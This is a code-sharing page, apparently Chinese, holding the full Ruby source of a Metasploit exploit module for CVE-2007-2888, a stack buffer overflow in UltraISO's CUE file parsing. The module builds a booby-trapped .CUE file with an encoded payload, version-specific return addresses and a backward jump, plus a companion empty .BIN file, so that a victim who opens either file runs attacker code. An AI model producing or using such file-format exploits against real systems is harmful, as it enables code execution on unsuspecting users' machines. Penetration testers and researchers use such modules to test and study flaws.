扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 |
## # $Id: ultraiso_cue.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'UltraISO CUE File Parsing Buffer Overflow', 'Description'=> %q{ This module exploits a stack-based buffer overflow in EZB Systems, Inc's UltraISO. When processing .CUE files, data is read from file into a fixed-size stack buffer. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open an CUE file. NOTE: A file with the same base name, but the extension of "bin" must also exist. Opening either file will trigger the vulnerability, but the files must both exist. }, 'License'=> MSF_LICENSE, 'Author' => [ 'n00b',# original discovery 'jduck' # metasploit version ], 'Version'=> '$Revision: 9179 $', 'References' => [ [ 'CVE', '2007-2888' ], [ 'OSVDB', '36570' ], [ 'BID', '24140' ], [ 'URL', 'http://www.exploit-db.com/exploits/3978' ] ], 'Payload'=> { 'Space' => 1024, 'BadChars'=> "\x00\x0a\x0d\x22", 'DisableNops' => true, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", }, 'Platform' => 'win', 'Targets'=> [ # BOF @ 0x005e1f8b # The EXE base addr contains a bad char (nul). This prevents us from # writing data after the return address.NOTE: An SEH exploit was # originally created for this vuln, but was tossed in favor of using # the return address method instead. This is due to the offset being # stable across different open methods. [ 'Windows - UltraISO v8.6.2.2011 portable', { 'Offset' => 1100, 'JmpOff' => 0x30, # offset from the end to our jmp 'Ret' => 0x00594740 # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe } ], [ 'Windows - UltraISO v8.6.0.1936', { 'Offset' => 1100, 'JmpOff' => 0x30, # offset from the end to our jmp 'Ret' => 0x0059170c # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe } ], ], 'Privileged' => false, 'DisclosureDate' => 'May 24 2007', 'DefaultTarget'=> 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.','msf.cue']), ], self.class) end def exploit off = target['Offset'] jmpoff = target['JmpOff'] sploit = "\"" sploit << payload.encoded sploit << rand_text_alphanumeric(off - sploit.length) # Smashed return address.. sploit[off, 4] = [target.ret].pack('V') # We utilize a single instruction near the end of the buffer space to # jump back to the beginning of the buffer.. distance = off - jmpoff distance -= 1 # dont execute the quote character! jmp = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string sploit[off - jmpoff, jmp.length] = jmp sploit << ".BIN\"" cue_data = "FILE " cue_data << sploit cue_data << " BINARY\r\n" cue_data << " TRACK 01 MODE1/2352\r\n" cue_data << " INDEX 01 00:00:00\r\n" print_status("Creating '#{datastore['FILENAME']}' using target '#{target.name}' ...") file_create(cue_data) # create the empty BIN file binfn = datastore['FILENAME'].dup binfn.gsub!(/\.cue$/, '.bin') out = File.expand_path(File.join(datastore['OUTPUTPATH'], binfn)) File.new(out,"wb").close print_status("Created empty output file #{out}") end end |
体验盒子
